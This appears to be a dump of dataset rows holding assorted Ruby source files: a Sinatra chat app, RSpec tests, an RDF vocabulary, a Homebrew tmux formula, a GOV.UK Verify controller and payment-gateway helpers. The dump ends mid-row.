hexsha
stringlengths
40
40
size
int64
2
1.01M
content
stringlengths
2
1.01M
avg_line_length
float64
1.5
100
max_line_length
int64
2
1k
alphanum_fraction
float64
0.25
1
6125d7fbf1e2d8293e31150336ebe383f2042820
199
class CrudHistoryJob < ApplicationJob queue_as :default def perform(user_id,action,content) CrudHistoryService.new(user_id: user_id, action: action, content: content ).save_action end end
24.875
91
0.78392
0354396cc0d17fe879bb82ace34083e352cada22
95
# Sample code from Programing Ruby, page 503 prc = lambda { "hello" } prc.call
23.75
44
0.589474
2662c52f52a789db72ea09fc3108d5afae430149
599
module Makoto class BadMoodResponderTest < TestCase def setup @responder = BadMoodResponder.new end def test_executable? @responder.params = {'content' => 'ネギトロ丼', 'account' => test_account} assert_false(@responder.executable?) @responder.params = {'content' => 'おちんちん', 'account' => test_account} assert(@responder.executable?) assert(@responder.exec.present?) end def test_continue? assert_false(@responder.continue?) end def test_exec @responder.exec assert(@responder.paragraphs.present?) end end end
23.038462
75
0.656093
394cac839ffbcb87859e6f9ea22a122efddaca12
111
# frozen_string_literal: true Rails.application.routes.draw do devise_for :users root to: "home#index" end
18.5
32
0.774775
ac8e98b6ae55bdefafcb13b7513c90c2d8d014e8
1,246
# -------------------------------------------------------------------------- # # Copyright 2002-2022, OpenNebula Project, OpenNebula Systems # # # # Licensed under the Apache License, Version 2.0 (the "License"); you may # # not use this file except in compliance with the License. You may obtain # # a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # #--------------------------------------------------------------------------- # $: << '.' require 'oneflow-server' run Sinatra::Application
62.3
78
0.407705
bf8c7bfc3235251b87f331689ea42adeff604eec
35
require 'pp' require 'gmap_plotter'
17.5
22
0.8
0898511a246c7eaf79447c11323b60219be65d97
1,124
require 'httparty' module PostmanMta class ApiRequest include ::HTTParty base_uri PostmanMta.api_endpoint attr_reader :request_type, :path, :options, :callback def initialize(request_type, path, options = {}) @callback = PostmanMta.before_request_hook @request_type = request_type @path = path @options = options end def perform self.class.send(request_type.downcase, path, request_options) end def full_path @full_path ||= PostmanMta.api_endpoint + path end def uri @uri ||= URI(full_path) end private def request_options { headers: auth_headers, format: :json }.merge(merge_with_custom_options) end def auth_headers PostmanMta::Utils::SignedRequest.new(request_method: request_type.upcase, path: uri.request_uri).headers end def merge_with_custom_options return options unless callback custom_options = callback.call return options unless custom_options.is_a?(Hash) options[:body] = (options[:body] || {}).merge(custom_options) options end end end
21.615385
110
0.681495
38c0fe1052030c6f092d9e0f8e3e64de587d9cb9
519
class RefreshMaterializedView mattr_accessor :current_thread_token class << self def call(table_name) Thread.new do token = SecureRandom.hex mutex.synchronize do self.current_thread_token = token end sleep 4 Scenic.database.refresh_materialized_view(table_name.to_sym, concurrently: true) if current_thread_token == token Post.last_refresh = Time.current end end private def mutex @mutex ||= Mutex.new end end end
21.625
121
0.660886
d5deef4246a274fb4a475277b3999414ff10590b
141
class TrustExistingOrganizations < ActiveRecord::Migration def up ::Organization.update_all(trusted: true) end def down end end
15.666667
58
0.751773
8710ee79ff457ddf83d709a0c21191bdc589a15e
221
module Admin class ReportsAuditController < BaseController private def report_audit_params # params.permit! params.require(:report_audit).permit(:editor, :action, :params) end end end
20.090909
71
0.683258
87df3294d7aff851186dc07b77d01b4bb3a10b5d
7,962
# -*- encoding: utf-8 -*- # frozen_string_literal: true # This file generated automatically using rdf vocabulary format from http://www.w3.org/ns/auth/acl# require 'rdf' module RDF::Vocab # @!parse # # Vocabulary for <http://www.w3.org/ns/auth/acl#> # class ACL < RDF::StrictVocabulary # end class ACL < RDF::StrictVocabulary("http://www.w3.org/ns/auth/acl#") # Ontology definition ontology :"http://www.w3.org/ns/auth/acl#", comment: %(Defines the class Authorization and its essential properties, and also some classes of access such as read and write. ).freeze, "dc11:title": "Basic Access Control ontology".freeze # Class definitions term :Access, "acl:label": "access".freeze, comment: %(Any kind of access to a resource. Don't use this, use R W and RW).freeze, type: "rdfs:Class".freeze term :Append, comment: %(Append accesses are specific write access which only add information, and do not remove information. For text files, for example, append access allows bytes to be added onto the end of the file. For RDF graphs, Append access allows adds triples to the graph but does not remove any. Append access is useful for dropbox functionality. Dropbox can be used for link notification, which the information added is a notification that a some link has been made elsewhere relevant to the given resource. ).freeze, label: "append".freeze, subClassOf: ["acl:Access".freeze, "acl:Write".freeze], type: "rdfs:Class".freeze term :AuthenticatedAgent, comment: %(A class of agents who have been authenticated. In other words, anyone can access this resource, but not anonymously. The social expectation is that the authentication process will provide an identify and a name, or pseudonym. \(A new ID should not be minted for every access: the intent is that the user is able to continue to use the ID for continues interactions with peers, and for example to develop a reputation\) ).freeze, label: "Anyone authenticated".freeze, subClassOf: "foaf:Agent".freeze, type: "rdfs:Class".freeze term :Authorization, comment: %(An element of access control, allowing agent to agents access of some kind to resources or classes of resources).freeze, label: "authorization".freeze, type: "rdfs:Class".freeze term :Control, comment: %(Allows read/write access to the ACL for the resource\(s\)).freeze, label: "control".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze term :Origin, comment: %(An Origin is basically a web site \(Note WITHOUT the trailing slash after the domain name and port in its URI\) and is the basis for controlling access to data by web apps in the Same Origin Model of web security. All scripts from the same origin are given the same right.).freeze, label: "Origin".freeze, "rdfs:seeAlso": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin".freeze, type: "rdfs:Class".freeze term :Read, comment: %(The class of read operations).freeze, label: "read".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze term :Write, label: "write".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze # Property definitions property :accessControl, comment: %(The Access Control file for this information resource. This may of course be a virtual resource implemented by the access control system. Note also HTTP's header Link: foo.meta ;rel=meta can be used for this.).freeze, domain: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, label: "access control".freeze, range: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, subPropertyOf: "rdfs:seeAlso".freeze, type: "rdf:Property".freeze property :accessTo, comment: %(The information resource to which access is being granted.).freeze, domain: "acl:Authorization".freeze, label: "to".freeze, range: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, type: "rdf:Property".freeze property :accessToClass, comment: %(A class of information resources to which access is being granted.).freeze, domain: "acl:Authorization".freeze, label: "to all in".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :agent, comment: %(A person or social entity to being given the right).freeze, domain: "acl:Authorization".freeze, label: "agent".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze property :agentClass, comment: %(A class of persons or social entities to being given the right).freeze, domain: "acl:Authorization".freeze, label: "agent class".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :agentGroup, comment: %(A group of persons or social entities to being given the right. The right is given to any entity which is a vcard:member of the group, as defined by the document received when the Group is dereferenced.).freeze, domain: "acl:Authorization".freeze, label: "agent group".freeze, range: "vcard:Group".freeze, type: "rdf:Property".freeze property :default, comment: %(If a resource has no ACL file \(it is 404\), then access to the resource if given by the ACL of the immediately containing directory, or failing that \(404\) the ACL of the recursively next containing directory which has an ACL file. Within that ACL file, any Authentication which has that directory as its acl:default applies to the resource. \(The highest directory must have an ACL file.\) ).freeze, domain: "acl:Authorization".freeze, label: "default access for things in this".freeze, type: "rdf:Property".freeze property :defaultForNew, comment: %(THIS IS OBSOLETE AS OF 2017-08-01. See 'default'. Was: A directory for which this authorization is used for new files in the directory.).freeze, domain: "acl:Authorization".freeze, label: "default access for new things in the object".freeze, type: "rdf:Property".freeze property :delegates, comment: %(Delegates a person or another agent to act on behalf of the agent. For example, Alice delegates Bob to act on behalf of Alice for ACL purposes.).freeze, label: "delegates".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze property :mode, comment: %(A mode of access such as read or write.).freeze, domain: "acl:Authorization".freeze, label: "access mode".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :origin, comment: %(A web application, identified by its Origin, such as <https://scripts.example.com>, being given the right. When a user of the web application at a certain origin accesses the server, then the browser sets the Origin: header to warn that a possibly untrusted webapp is being used. Then, BOTH the user AND the origin must have the required access.).freeze, domain: "acl:Authorization".freeze, label: "origin".freeze, range: "acl:Origin".freeze, "rdfs:seeAlso": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin".freeze, type: "rdf:Property".freeze property :owner, comment: %(The person or other agent which owns this. For example, the owner of a file in a filesystem. There is a sense of right to control. Typically defaults to the agent who craeted something but can be changed.).freeze, label: "owner".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze end end
47.112426
117
0.681487
7a48403e94b295aca7448780143d9fd78d3eab73
270
s = File.read(__dir__ + "/index.html") s.gsub!(/\n/, "\\n"); s.gsub!(/\"/, '\"'); #s = "#define _INDEX_HTML \"#{s}\"" #s = "static const char* _INDEX_HTML = \"#{s}\";" s = "const char index_html[] PROGMEM = \"#{s}\";" File.write(__dir__ + "/../include/index_html.h", s)
33.75
51
0.544444
6aab513f07798c35eeac37adf3e3bb57c9ebd9a7
616
module Msf module RPC API_VERSION = "1.0" class Exception < RuntimeError attr_accessor :code, :message def initialize(code, message) self.code = code self.message = message end end class ServerException < RuntimeError attr_accessor :code, :error_message, :error_class, :error_backtrace def initialize(code, error_message, error_class, error_backtrace) self.code = code self.error_message = error_message self.error_class = error_class self.error_backtrace = error_backtrace end def to_s "#{self.error_class} #{self.error_message} #{self.error_backtrace}" end end end end
18.117647
69
0.746753
218f5a4de8c47fdd01fbdee5265330bf14f80e85
58
module Enklawa module Api VERSION = "0.2" end end
9.666667
19
0.637931
f818cdc6d81e82416b6fc09f53ce78a70df5b415
2,468
# # Hello, friend! # # This lab teaches basic Ruby Object syntax. # # ## Watch it fail # # Your first real failure should be something like this: # # ./friend_spec.rb:3: uninitialized constant Friend (NameError) # # Fix this by opening `friend.rb` and creating an empty class: # # class Friend # end # # Save it. Run the test again. # # ## Watch it fail again # # Now you should see an error like this: # # NoMethodError in 'Friend says hello' # undefined method `greeting' for #<Friend:0x1180f3c> # ./friend_spec.rb:5: # # This means that while it found the file, and it found the class, it # couldn't find the method named "greeting". # # ## Define the "greeting" method # # In `friend.rb`, add the following inside the class (before the "end"). # # def greeting # end # # Save it. Run the test again. # # ## Watch it fail some more # # Now you should see an error like this: # # 'Friend says hello' FAILED # expected: "Hello!", # got: nil (using ==) # ./friend_spec.rb:5: # # This means that there is a method, but it's not returning anything! # ("nil" is the Ruby way of saying "not anything".) # # ## Make it return something # # Inside the "greeting" method, put a single line containing a string # that is *not* "Hello!". (Here we are simulating you making an honest # mistake, so we can see what the error message looks like.) # # def greeting # "whuh?" # end # # Save it. Run the test again. # # ## Watch it fail yet again # # Now you should see an error like this: # # 'Friend says hello' FAILED # expected: "Hello!", # got: "whuh?" (using ==) # ./friend_spec.rb:5: # # Correct this by changing "whuh?" to "Hello!". Save it. Run the test # again. # # ## Watch it pass! # # Hooray! Finally! It works! # # ## Give yourself a high five # # Also, sing a song and do a little dance. # # ## And then... # # Fix the next failure! :-) # # Hint 1: in order to get the next test to pass, you will need to pass # a *parameter*: # # def greeting(who) # # Hint 2: once you do that, the **first** test might start failing # again. To fix both at the same time, you need to provide a **default # value** for that parameter: # # def greeting(who = nil) require "07_hello_friend" describe Friend do it "says hello" do expect(Friend.new.greeting).to eq("Hello!") end it "says hello to someone" do expect(Friend.new.greeting("Bob")).to eq("Hello, Bob!") end end
22.851852
72
0.645867
39b29076a18139d03ed736a3f0bb5ec79c00a14d
2,102
#!/usr/bin/env ruby # # stats for May Hachem # # an ad-hoc hack by Asaf Bartov <[email protected]> # # tested on Ruby 2.3. require 'rubygems' require 'mediawiki_api' START_DATE = Date.new(2016,8,11) #START_DATE = Date.new(2016,7,12) END_DATE = Date.new(2016,8,12) def delta_for_article(mw, art) r = mw.query(prop: 'revisions', titles:art, rvprop:'timestamp|size', rvlimit:500) # assume it's within the last 500 revs... begin if r.data['pages'].keys.first == '-1' puts "\n--> red link: #{art}" return -99999 end revs = r.data['pages'].first[1]['revisions'] cursize = revs[0]['size'] last_relevant_rev = nil first_relevant_rev = nil revs.each {|rev| revdate = Date.parse(rev['timestamp']) if revdate >= START_DATE and revdate <= END_DATE last_relevant_rev = rev if last_relevant_rev.nil? first_relevant_rev = rev # keep assigning revs until we find one that's outside the range, or end up with the creation of the article else next if last_relevant_rev.nil? # haven't reached the interested revs yet; keep looking first_relevant_rev = rev # mark this latest rev *outside* the desired range, and stop break end } unless first_relevant_rev.nil? and last_relevant_rev.nil? return last_relevant_rev['size'] - first_relevant_rev['size'] else return 0 end rescue puts "\n! ERROR handling [[#{art}]]\n" return -99999 end end # main # initialize resources mw = MediawikiApi::Client.new("https://en.wikipedia.org/w/api.php") puts "reading article names..." lines = File.open('raw_article_names.txt','r').read.split("\n") print "gathering statistics... " count = 0 articles = {} lines.each {|l| if l =~ /\[\[(.*?)\]\]/ print "#{count}... " if count % 20 == 1 articles[$1] = delta_for_article(mw, $1) end count += 1 } File.open('stats_for_may.txt','w') {|f| count = 1 articles.keys.sort.each {|art| next if articles[art] == -99999 f.puts "#{count},#{art.gsub(',','\,')},#{articles[art]}" count += 1 } } puts "done!" exit 0
27.298701
141
0.641294
ab5530f9bd40f72f365a3e611ad7cd40078b736b
10,658
require 'digest/sha1' require 'mysql2' require 'sinatra/base' class App < Sinatra::Base configure do set :session_secret, 'tonymoris' set :public_folder, File.expand_path('../../public', __FILE__) set :avatar_max_size, 1 * 1024 * 1024 enable :sessions end configure :development do require 'sinatra/reloader' register Sinatra::Reloader end helpers do def user return @_user unless @_user.nil? user_id = session[:user_id] return nil if user_id.nil? @_user = db_get_user(user_id) if @_user.nil? params[:user_id] = nil return nil end @_user end end get '/initialize' do db.query("DELETE FROM user WHERE id > 1000") db.query("DELETE FROM image WHERE id > 1001") db.query("DELETE FROM channel WHERE id > 10") db.query("DELETE FROM message WHERE id > 10000") db.query("DELETE FROM haveread") 204 end get '/' do if session.has_key?(:user_id) return redirect '/channel/1', 303 end erb :index end get '/channel/:channel_id' do if user.nil? return redirect '/login', 303 end @channel_id = params[:channel_id].to_i @channels, @description = get_channel_list_info(@channel_id) erb :channel end get '/register' do erb :register end post '/register' do name = params[:name] pw = params[:password] if name.nil? || name.empty? || pw.nil? || pw.empty? return 400 end begin user_id = register(name, pw) rescue Mysql2::Error => e return 409 if e.error_number == 1062 raise e end session[:user_id] = user_id redirect '/', 303 end get '/login' do erb :login end post '/login' do name = params[:name] statement = db.prepare('SELECT * FROM user WHERE name = ?') row = statement.execute(name).first if row.nil? || row['password'] != Digest::SHA1.hexdigest(row['salt'] + params[:password]) return 403 end session[:user_id] = row['id'] redirect '/', 303 end get '/logout' do session[:user_id] = nil redirect '/', 303 end post '/message' do user_id = session[:user_id] message = params[:message] channel_id = params[:channel_id] if user_id.nil? || message.nil? || channel_id.nil? || user.nil? return 403 end db_add_message(channel_id.to_i, user_id, message) 204 end get '/message' do user_id = session[:user_id] if user_id.nil? return 403 end channel_id = params[:channel_id].to_i last_message_id = params[:last_message_id].to_i statement = db.prepare('SELECT * FROM message WHERE id > ? AND channel_id = ? ORDER BY id DESC LIMIT 100') rows = statement.execute(last_message_id, channel_id).to_a response = [] rows.each do |row| r = {} r['id'] = row['id'] statement = db.prepare('SELECT name, display_name, avatar_icon FROM user WHERE id = ?') r['user'] = statement.execute(row['user_id']).first r['date'] = row['created_at'].strftime("%Y/%m/%d %H:%M:%S") r['content'] = row['content'] response << r statement.close end response.reverse! max_message_id = rows.empty? ? 0 : rows.map { |row| row['id'] }.max statement = db.prepare([ 'INSERT INTO haveread (user_id, channel_id, message_id, updated_at, created_at) ', 'VALUES (?, ?, ?, NOW(), NOW()) ', 'ON DUPLICATE KEY UPDATE message_id = ?, updated_at = NOW()', ].join) statement.execute(user_id, channel_id, max_message_id, max_message_id) content_type :json response.to_json end get '/fetch' do user_id = session[:user_id] if user_id.nil? return 403 end sleep 1.0 rows = db.query('SELECT id FROM channel').to_a channel_ids = rows.map { |row| row['id'] } res = [] channel_ids.each do |channel_id| statement = db.prepare('SELECT * FROM haveread WHERE user_id = ? AND channel_id = ?') row = statement.execute(user_id, channel_id).first statement.close r = {} r['channel_id'] = channel_id r['unread'] = if row.nil? statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ?') statement.execute(channel_id).first['cnt'] else statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ? AND ? < id') statement.execute(channel_id, row['message_id']).first['cnt'] end statement.close res << r end content_type :json res.to_json end get '/history/:channel_id' do if user.nil? return redirect '/login', 303 end @channel_id = params[:channel_id].to_i @page = params[:page] if @page.nil? @page = '1' end if @page !~ /\A\d+\Z/ || @page == '0' return 400 end @page = @page.to_i n = 20 statement = db.prepare('SELECT * FROM message WHERE channel_id = ? ORDER BY id DESC LIMIT ? OFFSET ?') rows = statement.execute(@channel_id, n, (@page - 1) * n).to_a statement.close @messages = [] rows.each do |row| r = {} r['id'] = row['id'] statement = db.prepare('SELECT name, display_name, avatar_icon FROM user WHERE id = ?') r['user'] = statement.execute(row['user_id']).first r['date'] = row['created_at'].strftime("%Y/%m/%d %H:%M:%S") r['content'] = row['content'] @messages << r statement.close end @messages.reverse! statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ?') cnt = statement.execute(@channel_id).first['cnt'].to_f statement.close @max_page = cnt == 0 ? 1 :(cnt / n).ceil return 400 if @page > @max_page @channels, @description = get_channel_list_info(@channel_id) erb :history end get '/profile/:user_name' do if user.nil? return redirect '/login', 303 end @channels, = get_channel_list_info user_name = params[:user_name] statement = db.prepare('SELECT * FROM user WHERE name = ?') @user = statement.execute(user_name).first statement.close if @user.nil? return 404 end @self_profile = user['id'] == @user['id'] erb :profile end get '/add_channel' do if user.nil? return redirect '/login', 303 end @channels, = get_channel_list_info erb :add_channel end post '/add_channel' do if user.nil? return redirect '/login', 303 end name = params[:name] description = params[:description] if name.nil? || description.nil? return 400 end statement = db.prepare('INSERT INTO channel (name, description, updated_at, created_at) VALUES (?, ?, NOW(), NOW())') statement.execute(name, description) channel_id = db.last_id statement.close redirect "/channel/#{channel_id}", 303 end post '/profile' do if user.nil? return redirect '/login', 303 end if user.nil? return 403 end display_name = params[:display_name] avatar_name = nil avatar_data = nil file = params[:avatar_icon] unless file.nil? filename = file[:filename] if !filename.nil? && !filename.empty? ext = filename.include?('.') ? File.extname(filename) : '' unless ['.jpg', '.jpeg', '.png', '.gif'].include?(ext) return 400 end if settings.avatar_max_size < file[:tempfile].size return 400 end data = file[:tempfile].read digest = Digest::SHA1.hexdigest(data) avatar_name = digest + ext avatar_data = data end end if !avatar_name.nil? && !avatar_data.nil? statement = db.prepare('INSERT INTO image (name, data) VALUES (?, ?)') statement.execute(avatar_name, avatar_data) statement.close statement = db.prepare('UPDATE user SET avatar_icon = ? WHERE id = ?') statement.execute(avatar_name, user['id']) statement.close end if !display_name.nil? || !display_name.empty? statement = db.prepare('UPDATE user SET display_name = ? WHERE id = ?') statement.execute(display_name, user['id']) statement.close end redirect '/', 303 end get '/icons/:file_name' do file_name = params[:file_name] statement = db.prepare('SELECT * FROM image WHERE name = ?') row = statement.execute(file_name).first statement.close ext = file_name.include?('.') ? File.extname(file_name) : '' mime = ext2mime(ext) if !row.nil? && !mime.empty? content_type mime return row['data'] end 404 end private def db return @db_client if defined?(@db_client) @db_client = Mysql2::Client.new( host: ENV.fetch('ISUBATA_DB_HOST') { 'localhost' }, port: ENV.fetch('ISUBATA_DB_PORT') { '3306' }, username: ENV.fetch('ISUBATA_DB_USER') { 'root' }, password: ENV.fetch('ISUBATA_DB_PASSWORD') { '' }, database: 'isubata', encoding: 'utf8mb4' ) @db_client.query('SET SESSION sql_mode=\'TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY\'') @db_client end def db_get_user(user_id) statement = db.prepare('SELECT * FROM user WHERE id = ?') user = statement.execute(user_id).first statement.close user end def db_add_message(channel_id, user_id, content) statement = db.prepare('INSERT INTO message (channel_id, user_id, content, created_at) VALUES (?, ?, ?, NOW())') messages = statement.execute(channel_id, user_id, content) statement.close messages end def random_string(n) Array.new(20).map { (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a).sample }.join end def register(user, password) salt = random_string(20) pass_digest = Digest::SHA1.hexdigest(salt + password) statement = db.prepare('INSERT INTO user (name, salt, password, display_name, avatar_icon, created_at) VALUES (?, ?, ?, ?, ?, NOW())') statement.execute(user, salt, pass_digest, user, 'default.png') row = db.query('SELECT LAST_INSERT_ID() AS last_insert_id').first statement.close row['last_insert_id'] end def get_channel_list_info(focus_channel_id = nil) channels = db.query('SELECT * FROM channel ORDER BY id').to_a description = '' channels.each do |channel| if channel['id'] == focus_channel_id description = channel['description'] break end end [channels, description] end def ext2mime(ext) if ['.jpg', '.jpeg'].include?(ext) return 'image/jpeg' end if ext == '.png' return 'image/png' end if ext == '.gif' return 'image/gif' end '' end end
26.186732
138
0.615594
6a9b767a5ee6c092314741b7d930ac2ecdc5c86f
2,083
class Tmux < Formula desc "Terminal multiplexer" homepage "https://tmux.github.io/" url "https://github.com/tmux/tmux/releases/download/3.1c/tmux-3.1c.tar.gz" sha256 "918f7220447bef33a1902d4faff05317afd9db4ae1c9971bef5c787ac6c88386" license "ISC" revision 1 livecheck do url "https://github.com/tmux/tmux/releases/latest" regex(%r{href=.*?/tag/v?(\d+(?:\.\d+)+[a-z]?)["' >]}i) end bottle do cellar :any sha256 "e1148f3043ef1e77e942bc654e6b3867f40401b0ba93e6d44a460467c51e0a3b" => :catalina sha256 "3ba85f3524acbf5e1fb04135fa9b7f2bbdd5d3c8ed94189685be50ca19722bbe" => :mojave sha256 "ec5fcbdc337221efdbf3f21121fb087b998dd7d3bf6dd5bb72e352d9c9463a57" => :high_sierra sha256 "bc213b9772afee0e7e465c5862edb5d957e1e90c32d7bb41c859d085521e1a4d" => :x86_64_linux end head do url "https://github.com/tmux/tmux.git" depends_on "autoconf" => :build depends_on "automake" => :build depends_on "libtool" => :build end depends_on "pkg-config" => :build depends_on "libevent" depends_on "ncurses" # Old versions of macOS libc disagree with utf8proc character widths. # https://github.com/tmux/tmux/issues/2223 depends_on "utf8proc" if MacOS.version >= :high_sierra resource "completion" do url "https://raw.githubusercontent.com/imomaliev/tmux-bash-completion/f5d53239f7658f8e8fbaf02535cc369009c436d6/completions/tmux" sha256 "b5f7bbd78f9790026bbff16fc6e3fe4070d067f58f943e156bd1a8c3c99f6a6f" end def install system "sh", "autogen.sh" if build.head? args = %W[ --disable-dependency-tracking --prefix=#{prefix} --sysconfdir=#{etc} ] args << "--enable-utf8proc" if MacOS.version >= :high_sierra ENV.append "LDFLAGS", "-lresolv" system "./configure", *args system "make", "install" pkgshare.install "example_tmux.conf" bash_completion.install resource("completion") end def caveats <<~EOS Example configuration has been installed to: #{opt_pkgshare} EOS end test do system "#{bin}/tmux", "-V" end end
28.148649
132
0.712434
61372c5c2b3f56fb98f5e3f64e5dc366891b8d36
978
require 'spec_helper' require 'mocha/api' describe VagrantWindows::Helper , :unit => true do class DummyHelper include VagrantWindows::Helper end before(:all) do @dummy = DummyHelper.new end describe "win_friendly_path" do it "should replace slashes with backslashes" do @dummy.win_friendly_path('c:/tmp/dir').should eq('c:\\tmp\\dir') end it "should prepend c: drive if not drive specified" do @dummy.win_friendly_path('/tmp/dir').should eq('c:\\tmp\\dir') end it "should return nil if no path specified" do @dummy.win_friendly_path(nil).should be_nil end end describe "win_friendly_share_id" do it "should use share id if present" do @dummy.win_friendly_share_id('sharename').should eq('sharename') end it "should use last folder name in guest_path" do @dummy.win_friendly_share_id('/tmp/folder/sharename').should eq('tmp_folder_sharename') end end end
24.45
93
0.679959
62ae202445b94e6bce05adcc96b1cb48d21dd64f
945
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. module Google module Apis module RecommenderV1beta1 # Version of the google-apis-recommender_v1beta1 gem GEM_VERSION = "0.16.0" # Version of the code generator used to generate this client GENERATOR_VERSION = "0.4.0" # Revision of the discovery document this client was generated from REVISION = "20211105" end end end
32.586207
74
0.733333
bb31117c7f039ce0cef71c04113ef7f790dfa477
573
Pod::Spec.new do |spec| spec.name = "WFStream" spec.version = "1.0.1" spec.summary = "WFStream is for doing sequential stream things like JAVA." spec.homepage = "https://github.com/WindFantasy/WFStream" spec.license = "MIT" spec.author = { "Jerry" => "[email protected]" } spec.source = { :git => "https://github.com/WindFantasy/WFStream.git", :tag => "#{spec.version}" } spec.source_files = "**/*.{h,mm,m}" spec.exclude_files = "WFStreamTests" spec.public_header_files = "**/WFStream.h", "**/wf_stream.h" end
35.8125
106
0.614311
ab345e4bb07013387608a60423c8caa03905077e
928
module ActiveMerchant #:nodoc: module Billing #:nodoc: class PayflowExpressResponse < Response def email @params['e_mail'] end def full_name "#{@params['name']} #{@params['lastname']}" end def token @params['token'] end def payer_id @params['payer_id'] end # Really the shipping country, but it is all the information provided def payer_country address['country'] end def address { 'name' => full_name, 'company' => nil, 'address1' => @params['street'], 'address2' => nil, 'city' => @params['city'], 'state' => @params['state'], 'country' => @params['country'], 'zip' => @params['zip'], 'phone' => nil } end end end end
23.794872
75
0.457974
086f2e742ad6290ecfd219c99197ed7b0f59eeaf
2,653
module Verify class AuthenticationsController < BasePublicController CLAIM_TIMEOUT_LENGTH_IN_MINUTES = 90 include PartOfClaimJourney skip_before_action :verify_authenticity_token, only: [:create] # Page where a new Verify authentication request is generated and posted, as # described here: # # https://www.docs.verify.service.gov.uk/get-started/set-up-successful-verification-journey/#generate-an-authentication-request def new @verify_authentication_request = Verify::AuthenticationRequest.generate session[:verify_request_id] = @verify_authentication_request.request_id end # Callback where Verify will POST the SAML response for the authentication # attempt, as described here: # # https://www.docs.verify.service.gov.uk/get-started/set-up-successful-verification-journey/#handle-a-response def create @response = Verify::Response.translate(saml_response: params["SAMLResponse"], request_id: session[:verify_request_id], level_of_assurance: "LEVEL_2") report_redacted_response if @response.verified? parser = Claim::VerifyResponseParametersParser.new(@response.parameters) current_claim.update!(parser.attributes) redirect_to claim_url(current_policy_routing_name, "verified") else redirect_to verify_path_for_response_scenario(@response.scenario) end end def failed end def no_auth end # Users unable to complete the GOV.UK Verify identity assurance will be able # to visit this endpoint to continue their claim. def skip redirect_to claim_url(current_policy_routing_name, "name") end private def verify_path_for_response_scenario(scenario) case scenario when Verify::AUTHENTICATION_FAILED_SCENARIO failed_verify_authentications_path when Verify::NO_AUTHENTICATION_SCENARIO no_auth_verify_authentications_path end end def report_redacted_response redacted_response = Verify::RedactedResponse.new(@response.parameters) Rollbar.debug("Verify::RedactedResponse", parameters: redacted_response.parameters) end def current_policy_routing_name claim_from_session&.policy&.routing_name end # This controller is not namespaced to a policy so we can't redirect a user # to a policy-specific start page if a claim isn't in progress. Instead # redirect to the root URL and let the routing take care of sending the user # to the right place. def send_unstarted_claiments_to_the_start redirect_to root_url unless current_policy_routing_name end end end
35.373333
155
0.745194
21724b183f3dbbe109e3f659730f1fe9e198c0e7
2,401
# frozen_string_literal: true RSpec.describe 'MeiliSearch::Index - Filtered search' do include_context 'search books with author, genre, year' before do response = index.update_filterable_attributes(['genre', 'year', 'author']) index.wait_for_pending_update(response['updateId']) end it 'does a custom search with one filter' do response = index.search('le', { filter: 'genre = romance' }) expect(response['hits'].count).to eq(1) expect(response['hits'].first['objectId']).to eq(2) end it 'does a custom search with a numerical value filter' do response = index.search('potter', { filter: 'year = 2007' }) expect(response['hits'].count).to eq(1) expect(response['hits'].first['objectId']).to eq(2056) end it 'does a custom search with multiple filter' do response = index.search('prince', { filter: 'year > 1930 AND author = "Antoine de Saint-Exupéry"' }) expect(response['hits'].count).to eq(1) expect(response['hits'].first['objectId']).to eq(456) end it 'does a placeholder search with multiple filter' do response = index.search('', { filter: 'author = "J. K. Rowling" OR author = "George R. R. Martin"' }) expect(response['hits'].count).to eq(3) end it 'does a placeholder search with numerical values filter' do response = index.search('', { filter: 'year < 2000 AND year > 1990' }) expect(response['hits'].count).to eq(1) expect(response['hits'].first['year']).to eq(1996) end it 'does a placeholder search with multiple filter and different type of values' do response = index.search('', { filter: 'author = "J. K. Rowling" AND year > 2006' }) expect(response['hits'].count).to eq(1) expect(response['hits'].first['objectId']).to eq(2056) end it 'does a custom search with filter and array syntax' do response = index.search('prinec', filter: ['genre = fantasy']) expect(response.keys).to contain_exactly(*DEFAULT_SEARCH_RESPONSE_KEYS) expect(response['nbHits']).to eq(1) expect(response['hits'][0]['objectId']).to eq(4) end it 'does a custom search with multiple filter and array syntax' do response = index.search('potter', filter: ['genre = fantasy', ['year = 2005']]) expect(response.keys).to contain_exactly(*DEFAULT_SEARCH_RESPONSE_KEYS) expect(response['nbHits']).to eq(1) expect(response['hits'][0]['objectId']).to eq(4) end end
40.016667
105
0.677218
110b92c614007702f184e4834142a01962de06ad
98
module Yardmarshal class GemsController < ApplicationController def index end end end
14
46
0.755102
9144058f7eecaac253959f6b991731f16b70c46e
2,404
